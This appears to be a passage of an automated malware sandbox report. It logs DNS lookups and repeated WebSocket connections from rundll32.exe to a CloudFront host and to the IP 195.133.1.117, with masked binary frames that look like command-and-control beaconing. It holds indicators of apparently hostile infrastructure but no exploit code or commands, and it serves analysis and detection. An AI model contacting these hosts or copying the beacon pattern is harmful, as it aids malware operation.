                                  Dec 19, 2024 15:33:37.191641092 CET1.1.1.1192.168.2.60xebd2No error (0)d2np1vqkcxhde6.cloudfront.net13.227.9.174A (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:33:37.191641092 CET1.1.1.1192.168.2.60xebd2No error (0)d2np1vqkcxhde6.cloudfront.net13.227.9.133A (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:33:37.191641092 CET1.1.1.1192.168.2.60xebd2No error (0)d2np1vqkcxhde6.cloudfront.net13.227.9.64A (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:33:37.191641092 CET1.1.1.1192.168.2.60xebd2No error (0)d2np1vqkcxhde6.cloudfront.net13.227.9.48A (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:33:43.471576929 CET1.1.1.1192.168.2.60xc47eNo error (0)o4508128816857088.ingest.de.sentry.io34.120.62.213A (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:34:40.348290920 CET1.1.1.1192.168.2.60x1ae4No error (0)d2np1vqkcxhde6.cloudfront.net13.227.9.48A (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:34:40.348290920 CET1.1.1.1192.168.2.60x1ae4No error (0)d2np1vqkcxhde6.cloudfront.net13.227.9.174A (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:34:40.348290920 CET1.1.1.1192.168.2.60x1ae4No error (0)d2np1vqkcxhde6.cloudfront.net13.227.9.133A (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:34:40.348290920 CET1.1.1.1192.168.2.60x1ae4No error (0)d2np1vqkcxhde6.cloudfront.net13.227.9.64A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • o4508128816857088.ingest.de.sentry.io
                                  • d2np1vqkcxhde6.cloudfront.net
                                  • 195.133.1.117

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.64974713.227.9.174802912C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:33:37.346776009 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: hYIl3tcxOdFjfsPRnTVigw==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.64975813.227.9.174805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:33:40.634614944 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: 4o/S/DnI/xUOQ7/tWSDOmw==
                                  Dec 19, 2024 15:33:42.285434961 CET363INHTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: FNrr22x3FG7ewK4F8l7R0ycBBmE=
                                  date: Thu, 19 Dec 2024 14:33:41 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 e94ebbd334f21d0c5b4f99e7409632a4.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: jewh7U2KNppS8B-uTVyueMHMeQqmIxOdOPLW5h7ZqGAbSOvlfnw8vg==
                                  Dec 19, 2024 15:33:42.605783939 CET193OUTData Raw: 82 fe 00 b9 07 09 47 91 07 01 22 ff 60 60 29 f4 62 7b 4c d4 49 4e 0e df 42 4c 15 bc 57 4a 4c d4 49 4e 0e df 42 4c 15 bc 57 4a 46 a3 5c 5b 77 cc 27 5b 03 c5 54 4a 6b b1 36 29 21 f0 6e 65 6b b1 35 29 21 f0 6e 65 6b b1 33 29 21 f0 6e 65 6b b1 31 29
                                  Data Ascii: G"``)b{LINBLWJLINBLWJF\[w'[TJk6)!nek5)!nek3)!nek1)!nek?)!nepi}.n{2(Z"r{.~](kzkAf5nJ+bg3hz3bj2n}>)9i20ga:v>ms?>~eos4=!71#elu1:t8i);&
                                  Dec 19, 2024 15:33:42.725708961 CET6OUTData Raw: 89 80 7f a3 54 42
                                  Data Ascii: TB
                                  Dec 19, 2024 15:33:43.199361086 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.649785195.133.1.117805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:33:48.370152950 CET154OUTGET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: mm3wcIuOeiJHtLi7cs4F3g==
                                  Dec 19, 2024 15:33:49.716358900 CET166INHTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: o6U6dQzERko9sm7UXGc5RDmEJ6U=
                                  date: Thu, 19 Dec 2024 14:33:49 GMT
                                  Dec 19, 2024 15:33:49.913068056 CET193OUTData Raw: 82 fe 00 b9 18 56 11 97 18 5e 74 f9 7f 3f 7f f2 7d 24 1a d2 56 11 58 d9 5d 13 43 ba 48 15 1a d2 56 11 58 d9 5d 13 43 ba 48 15 10 a5 43 04 21 ca 38 04 55 c3 4b 15 3d b7 29 76 77 f6 71 3a 3d b7 2a 76 77 f6 71 3a 3d b7 2c 76 77 f6 71 3a 3d b7 2e 76
                                  Data Ascii: V^t?}$VX]CHVX]CHC!8UK=)vwq:=*vwq:=,vwq:=.vwq:= vwq:&v"xq$d7tm$xa~t%=^9cq}}8ew%e}5dq"h6f?-o1~e !2% a(z0%+bw(nuz3#.e"g?6dp
                                  Dec 19, 2024 15:33:50.033859968 CET6OUTData Raw: 89 80 4d e5 1a fd
                                  Data Ascii: M
                                  Dec 19, 2024 15:33:50.350435972 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.64980213.227.9.174805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:33:55.479561090 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: RNaQVJ0zTL1uqG8J1zu+SQ==
                                  Dec 19, 2024 15:33:57.195384979 CET363INHTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: Ul+EK1gGu6Yc7NoPwd4p5LHTfUw=
                                  date: Thu, 19 Dec 2024 14:33:56 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 5d8f90037465fc1f7bd2f356871e7d64.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: RppiH4K7ItLPGrJRhI4Rc36C-WvG0iCtFfET3ATREcS5IhBuVjbF3Q==
                                  Dec 19, 2024 15:33:57.397694111 CET193OUTData Raw: 82 fe 00 b9 c5 04 7e 29 c5 0c 1b 47 a2 6d 10 4c a0 76 75 6c 8b 43 37 67 80 41 2c 04 95 47 75 6c 8b 43 37 67 80 41 2c 04 95 47 7f 1b 9e 56 4e 74 e5 56 3a 7d 96 47 52 09 f4 24 18 48 ac 68 52 09 f7 24 18 48 ac 68 52 09 f1 24 18 48 ac 68 52 09 f3 24
                                  Data Ascii: ~)GmLvulC7gA,GulC7gA,GVNtV:}GR$HhR$HhR$HhR$HhR$HhIhp_vZWJv]PFwRk]G@jawzg[p4P=^L7O`J3GbJ0<aL7M)5P6)
                                  Dec 19, 2024 15:33:57.517258883 CET6OUTData Raw: 89 80 d4 d5 28 f4
                                  Data Ascii: (
                                  Dec 19, 2024 15:33:57.995872021 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.649821195.133.1.117805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:34:03.129868984 CET154OUTGET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: gJK8B/FHxxJOrYPc07zPdA==
                                  Dec 19, 2024 15:34:04.454114914 CET166INHTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: evVrlLPoPgxHyCvgaI4viaiTfw4=
                                  date: Thu, 19 Dec 2024 14:34:04 GMT
                                  Dec 19, 2024 15:34:05.156804085 CET193OUTData Raw: 82 fe 00 b9 92 8d b1 3a 92 85 d4 54 f5 e4 df 5f f7 ff ba 7f dc ca f8 74 d7 c8 e3 17 c2 ce ba 7f dc ca f8 74 d7 c8 e3 17 c2 ce b0 08 c9 df 81 67 b2 df f5 6e c1 ce 9d 1a a3 ad d7 5b fb e1 9d 1a a0 ad d7 5b fb e1 9d 1a a6 ad d7 5b fb e1 9d 1a a4 ad
                                  Data Ascii: :T_ttgn[[[[[{LIYNUNSriH_::
                                  Dec 19, 2024 15:34:05.281177998 CET6OUTData Raw: 89 80 c6 9a 3c ee
                                  Data Ascii: <
                                  Dec 19, 2024 15:34:05.598139048 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.64983913.227.9.174805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:34:10.740097046 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: 3I3wooedh91j3GxPYkeArw==
                                  Dec 19, 2024 15:34:12.379698992 CET363INHTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: E7DHd6CZtxGtPG3u7rKhTe2/5qw=
                                  date: Thu, 19 Dec 2024 14:34:11 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 c21fdfe928c795c1f24f3b6117a48670.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: LAdWqGM3ZE40rQQpZFGMqI7_ZDnNOa4eqmLuehIqpqiiy5l7Ciii4Q==
                                  Dec 19, 2024 15:34:12.557523966 CET193OUTData Raw: 82 fe 00 b9 57 85 19 c3 57 8d 7c ad 30 ec 77 a6 32 f7 12 86 19 c2 50 8d 12 c0 4b ee 07 c6 12 86 19 c2 50 8d 12 c0 4b ee 07 c6 18 f1 0c d7 29 9e 77 d7 5d 97 04 c6 35 e3 66 a5 7f a2 3e e9 35 e3 65 a5 7f a2 3e e9 35 e3 63 a5 7f a2 3e e9 35 e3 61 a5
                                  Data Ascii: WW|0w2PKPK)w]5f>5e>5c>5a>5o>.9p>lx|"p.v;5k>u2m8m2l>`y7b91(n-o 5-dg}5+a*Q7yxW
                                  Dec 19, 2024 15:34:12.677674055 CET6OUTData Raw: 89 80 54 6c 2d 43
                                  Data Ascii: Tl-C
                                  Dec 19, 2024 15:34:13.163121939 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.649856195.133.1.117805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:34:18.291609049 CET154OUTGET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: JApRj8zYZyC8oZg2we4Azg==
                                  Dec 19, 2024 15:34:19.637278080 CET166INHTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: +M9DBILUcoy42qToW/piyouixoc=
                                  date: Thu, 19 Dec 2024 14:34:19 GMT
                                  Dec 19, 2024 15:34:19.815155029 CET193OUTData Raw: 82 fe 00 b9 57 5a 91 a9 57 52 f4 c7 30 33 ff cc 32 28 9a ec 19 1d d8 e7 12 1f c3 84 07 19 9a ec 19 1d d8 e7 12 1f c3 84 07 19 90 9b 0c 08 a1 f4 77 08 d5 fd 04 19 bd 89 66 7a f7 c8 3e 36 bd 89 65 7a f7 c8 3e 36 bd 89 63 7a f7 c8 3e 36 bd 89 61 7a
                                  Data Ascii: WZWR032(wfz>6ez>6cz>6az>6oz>69.>(x"(.;)5>248)29>.yjbc1in>om5<dngb5?aiQkyhW
                                  Dec 19, 2024 15:34:19.934922934 CET6OUTData Raw: 89 80 d1 8d 05 e1
                                  Data Ascii:
                                  Dec 19, 2024 15:34:20.301285982 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.64987613.227.9.174805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:34:25.424748898 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: MG/uZPS22IGDcq20LYVyjA==
                                  Dec 19, 2024 15:34:27.064802885 CET363INHTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: kRZzgJbyRcfw0TCvAZ/+URRVnW0=
                                  date: Thu, 19 Dec 2024 14:34:26 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 ba38368c2b2437f314bbc0ee51e6632e.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: nYAiC1h7c5GzHMFBHcFO5oJsw08R1sIq8T9Hjyb3TgF7XaS-2hS6Vw==
                                  Dec 19, 2024 15:34:27.354855061 CET193OUTData Raw: 82 fe 00 b9 0f b8 95 d2 0f b0 f0 bc 68 d1 fb b7 6a ca 9e 97 41 ff dc 9c 4a fd c7 ff 5f fb 9e 97 41 ff dc 9c 4a fd c7 ff 5f fb 94 e0 54 ea a5 8f 2f ea d1 86 5c fb b9 f2 3e 98 f3 b3 66 d4 b9 f2 3d 98 f3 b3 66 d4 b9 f2 3b 98 f3 b3 66 d4 b9 f2 39 98
                                  Data Ascii: hjAJ_AJ_T/\>f=f;f9f7faf zvcIfj`jf!:i67m<?m9!
                                  Dec 19, 2024 15:34:27.474833965 CET6OUTData Raw: 89 80 b2 85 a8 a4
                                  Data Ascii:
                                  Dec 19, 2024 15:34:27.944556952 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.649893195.133.1.117805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:34:33.072304010 CET154OUTGET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: /G1bGErhqg3xJ3/YMCdIKA==
                                  Dec 19, 2024 15:34:34.408550024 CET166INHTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: 9HnImZ6yJL5mIkWKAPEFfABAIYU=
                                  date: Thu, 19 Dec 2024 14:34:34 GMT
                                  Dec 19, 2024 15:34:34.696934938 CET193OUTData Raw: 82 fe 00 b9 8f df 25 ca 8f d7 40 a4 e8 b6 4b af ea ad 2e 8f c1 98 6c 84 ca 9a 77 e7 df 9c 2e 8f c1 98 6c 84 ca 9a 77 e7 df 9c 24 f8 d4 8d 15 97 af 8d 61 9e dc 9c 09 ea be ff 43 ab e6 b3 09 ea bd ff 43 ab e6 b3 09 ea bb ff 43 ab e6 b3 09 ea b9 ff
                                  Data Ascii: %@K.lw.lw$aCCCCCLP@LJWIQQP\CAD
                                  Dec 19, 2024 15:34:34.817425013 CET6OUTData Raw: 89 80 78 89 e6 d9
                                  Data Ascii: x
                                  Dec 19, 2024 15:34:35.134330034 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.64990913.227.9.48805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:34:40.469644070 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: o9P6bbQkBpkHJSDprgi2YQ==
                                  Dec 19, 2024 15:34:42.144905090 CET363INHTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: 0ANSTJ1HNt7NA5JJj55kxT4anCA=
                                  date: Thu, 19 Dec 2024 14:34:41 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 5064313e440a4fd329eb4dda0aa4fb12.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: hhxQSlPdp4ayneHUZtqf45MHfeHGr_tEi20RpYFkDFJiYoYcX3-wPA==
                                  Dec 19, 2024 15:34:42.309211016 CET193OUTData Raw: 82 fe 00 b9 91 96 e7 8b 91 9e 82 e5 f6 ff 89 ee f4 e4 ec ce df d1 ae c5 d4 d3 b5 a6 c1 d5 ec ce df d1 ae c5 d4 d3 b5 a6 c1 d5 e6 b9 ca c4 d7 d6 b1 c4 a3 df c2 d5 cb ab a0 b6 81 ea f8 fa cb ab a3 b6 81 ea f8 fa cb ab a5 b6 81 ea f8 fa cb ab a7 b6
                                  Data Ascii:
                                  Dec 19, 2024 15:34:42.429136992 CET6OUTData Raw: 89 80 6a 20 7c 29
                                  Data Ascii: j |)
                                  Dec 19, 2024 15:34:42.902257919 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.649927195.133.1.117805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:34:48.027105093 CET154OUTGET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: MG/wcOLqwZyraIHV6mN2eA==
                                  Dec 19, 2024 15:34:49.359086990 CET166INHTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: 55D2TOQn2PTDwUXD9oE2QwDEakg=
                                  date: Thu, 19 Dec 2024 14:34:48 GMT
                                  Dec 19, 2024 15:34:50.026510000 CET193OUTData Raw: 82 fe 00 b9 15 06 79 76 15 0e 1c 18 72 6f 17 13 70 74 72 33 5b 41 30 38 50 43 2b 5b 45 45 72 33 5b 41 30 38 50 43 2b 5b 45 45 78 44 4e 54 49 2b 35 54 3d 22 46 45 55 56 24 26 1f 17 7c 6a 55 56 27 26 1f 17 7c 6a 55 56 21 26 1f 17 7c 6a 55 56 23 26
                                  Data Ascii: yvroptr3[A08PC+[EEr3[A08PC+[EExDNTI+5T="FEUV$&|jUV'&|jUV!&|jUV#&|jUV-&|jN7{r|t:U`tlRyuUVSi|Eph>zu%pe|rE;6WB ?Ys5HA,bMO-1@Ew`MD&2A%>EwcKN#5Jv7WF;4v
                                  Dec 19, 2024 15:34:50.146585941 CET6OUTData Raw: 89 80 74 70 99 67
                                  Data Ascii: tpg
                                  Dec 19, 2024 15:34:50.462704897 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.64994513.227.9.48805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:34:55.589782000 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: enC0Es7mdVSw6GUwznNaLQ==
                                  Dec 19, 2024 15:34:57.333468914 CET363INHTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: 5jnj1jyCZYTV24H3SS027dXjv0c=
                                  date: Thu, 19 Dec 2024 14:34:56 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 28067c3a345fdd5277603bfdb86abe14.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: 0qXiGbeqOklCvAwUvrO7qwHl0DeUuy8lwPwwGZWQusdZi8p7xkf9aA==
                                  Dec 19, 2024 15:34:57.516567945 CET193OUTData Raw: 82 fe 00 b9 6f 63 06 2c 6f 6b 63 42 08 0a 68 49 0a 11 0d 69 21 24 4f 62 2a 26 54 01 3f 20 0d 69 21 24 4f 62 2a 26 54 01 3f 20 07 1e 34 31 36 71 4f 31 42 78 3c 20 2a 0c 5e 43 60 4d 06 0f 2a 0c 5d 43 60 4d 06 0f 2a 0c 5b 43 60 4d 06 0f 2a 0c 59 43
                                  Data Ascii: oc,okcBhIi!$Ob*&T? i!$Ob*&T? 416qO1Bx< *^C`M*]C`M*[C`M*YC`M*WC`M1moZs_@0cOoX7iC*)tX jErdrs^AS(ZZ&IP7V2WT?2\W`_[b4YP5,iR(AQg,o
                                  Dec 19, 2024 15:34:57.636703968 CET6OUTData Raw: 89 80 82 05 20 24
                                  Data Ascii: $
                                  Dec 19, 2024 15:34:58.107574940 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.649960195.133.1.117805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:35:03.235033035 CET154OUTGET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: YZ6gImeX26KgQbaMt7jJTg==
                                  Dec 19, 2024 15:35:04.601799011 CET166INHTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: TjGxtIRG2vW4vLPSHXLBt1M1HNY=
                                  date: Thu, 19 Dec 2024 14:35:04 GMT
                                  Dec 19, 2024 15:35:05.054141998 CET193OUTData Raw: 82 fe 00 b9 6e a9 b0 7b 6e a1 d5 15 09 c0 de 1e 0b db bb 3e 20 ee f9 35 2b ec e2 56 3e ea bb 3e 20 ee f9 35 2b ec e2 56 3e ea b1 49 35 fb 80 26 4e fb f4 2f 3d ea 9c 5b 5f 89 d6 1a 07 c5 9c 5b 5c 89 d6 1a 07 c5 9c 5b 5a 89 d6 1a 07 c5 9c 5b 58 89
                                  Data Ascii: n{n> 5+V>> 5+V>I5&N/=[_[\[Z[X[V:A[(3(H@O[LWBVHI]L^HCX{hK@{n
                                  Dec 19, 2024 15:35:05.173742056 CET6OUTData Raw: 89 80 3f f6 55 2f
                                  Data Ascii: ?U/
                                  Dec 19, 2024 15:35:05.494539022 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.64997613.227.9.48805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:35:10.617825985 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: mgtSMK+F6GzpGcK4RpjtGQ==
                                  Dec 19, 2024 15:35:12.266375065 CET363INHTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: AwnW06BTqEgVf8LcfwaevWup0cQ=
                                  date: Thu, 19 Dec 2024 14:35:11 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 4166c47260b95e2ec3436a0df75c7f38.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: 1i7mp4QEyV44ihBHpwbmfjPbVbMCD2k30-y-8EMAbMY7qnFBgN1vBQ==
                                  Dec 19, 2024 15:35:12.611402988 CET193OUTData Raw: 82 fe 00 b9 cb a9 eb df cb a1 8e b1 ac c0 85 ba ae db e0 9a 85 ee a2 91 8e ec b9 f2 9b ea e0 9a 85 ee a2 91 8e ec b9 f2 9b ea ea ed 90 fb db 82 eb fb af 8b 98 ea c7 ff fa 89 8d be a2 c5 c7 ff f9 89 8d be a2 c5 c7 ff ff 89 8d be a2 c5 c7 ff fd 89
                                  Data Ascii:
                                  Dec 19, 2024 15:35:12.732884884 CET6OUTData Raw: 89 80 ea 88 07 47
                                  Data Ascii: G
                                  Dec 19, 2024 15:35:13.203299999 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.649994195.133.1.117805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:35:18.332947016 CET154OUTGET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: 1W7A8pWbhZreG2T6Et2+aw==
                                  Dec 19, 2024 15:35:19.653090954 CET166INHTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: tzeXzASyAvZi/sJc9VNvZxqDOYw=
                                  date: Thu, 19 Dec 2024 14:35:19 GMT
                                  Dec 19, 2024 15:35:19.815685034 CET193OUTData Raw: 82 fe 00 b9 56 01 71 6b 56 09 14 05 31 68 1f 0e 33 73 7a 2e 18 46 38 25 13 44 23 46 06 42 7a 2e 18 46 38 25 13 44 23 46 06 42 70 59 0d 53 41 36 76 53 35 3f 05 42 5d 4b 67 21 17 0a 3f 6d 5d 4b 64 21 17 0a 3f 6d 5d 4b 62 21 17 0a 3f 6d 5d 4b 60 21
                                  Data Ascii: VqkV1h3sz.F8%D#FBz.F8%D#FBpYSA6vS5?B]Kg!?m]Kd!?m]Kb!?m]K`!?m]Kn!?mF*8u?syR#s/U:r]Kn?B3o#9r83b?uXx1__c8Q02@\oeERn6HX4gEYe5\f9X4dCS`2BkP0_[x3kV
                                  Dec 19, 2024 15:35:19.935591936 CET6OUTData Raw: 89 80 11 a9 82 87
                                  Data Ascii:
                                  Dec 19, 2024 15:35:20.257862091 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.65001013.227.9.48805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:35:25.394576073 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: 3bAo+RHHQYr0rCo3Cvgr5g==
                                  Dec 19, 2024 15:35:27.055901051 CET363INHTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: cBed5rCQtyHPmC4tQfJk23cMoxQ=
                                  date: Thu, 19 Dec 2024 14:35:26 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 5064313e440a4fd329eb4dda0aa4fb12.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: RFjItj10HZffYaQV4jRPFiTDzmR9RAmN-s_hU0CMu7OCoxvUXf3q4A==
                                  Dec 19, 2024 15:35:27.295422077 CET193OUTData Raw: 82 fe 00 b9 1e c9 d5 2a 1e c1 b0 44 79 a0 bb 4f 7b bb de 6f 50 8e 9c 64 5b 8c 87 07 4e 8a de 6f 50 8e 9c 64 5b 8c 87 07 4e 8a d4 18 45 9b e5 77 3e 9b 91 7e 4d 8a f9 0a 2f e9 b3 4b 77 a5 f9 0a 2c e9 b3 4b 77 a5 f9 0a 2a e9 b3 4b 77 a5 f9 0a 28 e9
                                  Data Ascii: *DyO{oPd[NoPd[NEw>~M/Kw,Kw*Kw(Kw&Kwkp\wY1Ik^gErX^wC{bqy{Xw0+Ox'&|-.|(*0*
                                  Dec 19, 2024 15:35:27.415915966 CET6OUTData Raw: 89 80 cf fb fa 12
                                  Data Ascii:
                                  Dec 19, 2024 15:35:27.901771069 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.650017195.133.1.117805328C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 19, 2024 15:35:33.036667109 CET154OUTGET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: RWInDnK7aInVBvxdqgFRfw==
                                  Dec 19, 2024 15:35:34.405636072 CET166INHTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: jclyKO+hHwhemsGdt2EXetRssEs=
                                  date: Thu, 19 Dec 2024 14:35:33 GMT


                                  HTTPS Proxied Packets

